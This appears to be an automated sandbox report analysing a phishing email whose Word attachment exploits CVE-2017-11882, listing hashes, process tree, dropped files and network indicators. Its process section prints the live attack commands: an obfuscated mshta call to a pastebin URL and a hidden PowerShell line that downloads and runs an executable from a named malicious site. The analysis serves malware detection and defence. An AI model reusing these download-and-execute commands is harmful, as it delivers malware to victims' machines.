analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

43kmtj46DnzR1nw.eml

Full analysis: https://app.any.run/tasks/c7c21efa-b9a1-4445-970b-01594b08086a
Verdict: Malicious activity
Analysis date: January 23, 2019, 06:01:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
Indicators:
MIME: message/rfc822
File info: RFC 822 mail, ASCII text
MD5:

78F23EBA15B7FC7A6BC11C13F8801C96

SHA1:

9D224C96DFC43971CECA90648DED6084A6B4FAB9

SHA256:

55B0163E69C738C5B909CC0FA1C591FB0ECDC75FCC460172DB45F169E1BA097C

SSDEEP:

3072:sD431r7XVc/VqL2QP7Q6lF6JHnO/0Y+Dy+ln8GHPgHjN:sDu1rZc/VqL2QP7Qaoztl8GHPgHjN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2540)
    • Executes PowerShell scripts

      • mshta.exe (PID: 3912)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • OUTLOOK.EXE (PID: 3008)
      • WINWORD.EXE (PID: 3156)
    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 3008)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cMd.exe (PID: 3380)
    • Application launched itself

      • WINWORD.EXE (PID: 3156)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 2540)
    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 3008)
      • mshta.exe (PID: 3912)
      • powershell.exe (PID: 2772)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3256)
      • WINWORD.EXE (PID: 3156)
      • OUTLOOK.EXE (PID: 3008)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3156)
    • Reads internet explorer settings

      • mshta.exe (PID: 3912)
    • Application was crashed

      • EQNEDT32.EXE (PID: 2540)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.eml | E-Mail message (Var. 5) (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
7
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start outlook.exe winword.exe no specs winword.exe no specs eqnedt32.exe cmd.exe no specs mshta.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3008"C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE" /eml "C:\Users\admin\AppData\Local\Temp\43kmtj46DnzR1nw.eml"C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
3156"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IEI6GFA6\Docs GEFCO -# 850858001894.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3256"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2540"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3380cMd /C mS^Ht^a ht^tp^s:^/^/pastebin.com/raw/H28nZ13UC:\Windows\system32\cMd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3912mSHta https://pastebin.com/raw/H28nZ13UC:\Windows\system32\mshta.exe
cMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2772"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://www.tibetsaveandcare.org/sites/default/files/ll1.exe',$env:Temp+'\KRQVHK.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\KRQVHK.Exe')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 962
Read events
2 812
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
6
Text files
27
Unknown types
2

Dropped files

PID
Process
Filename
Type
3008OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR90FB.tmp.cvr
MD5:
SHA256:
3008OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\tmp936D.tmp
MD5:
SHA256:
3008OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IEI6GFA6\Docs GEFCO -# 850858001894 (2).doc\:Zone.Identifier:$DATA
MD5:
SHA256:
3156WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2DB8.tmp.cvr
MD5:
SHA256:
3156WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_9505F550-0BDC-47F5-8369-D2D8469AA6C5.0\A1EA487C.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
3256WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_9505F550-0BDC-47F5-8369-D2D8469AA6C5.0\~WRS{0780EF5C-80DA-4E80-9F45-C26049E11772}.tmp
MD5:
SHA256:
2772powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RPN69FCWRTV9F5S504CS.temp
MD5:
SHA256:
3008OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\382FF3FE.dathtml
MD5:9F37397021A8F399805924A6572965C8
SHA256:91D2BABFEDBBD3A617BE8305131E20DBA8558B0A58B35A526F5E6E9AB79A3994
3008OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:E3D23D04DE458680AB8096C3C3BC843B
SHA256:90269BB36C70BB675CAA74CBED8707FA0121F1FC5E9E19B49FFB9582A60BB775
3156WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D2587401E4D0F2F45C4D376F24DAE608
SHA256:EB0855B4E6B8BC1FA7728FF0BD8DF473988B0CD2A549F3B02A7F6702CED6988C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3008
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
2772
powershell.exe
GET
500
213.186.33.40:80
http://www.tibetsaveandcare.org/sites/default/files/ll1.exe
FR
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3008
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
2772
powershell.exe
213.186.33.40:80
www.tibetsaveandcare.org
OVH SAS
FR
malicious
3912
mshta.exe
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
pastebin.com
  • 104.20.208.21
  • 104.20.209.21
shared
www.tibetsaveandcare.org
  • 213.186.33.40
malicious

Threats

PID
Process
Class
Message
2772
powershell.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
No debug info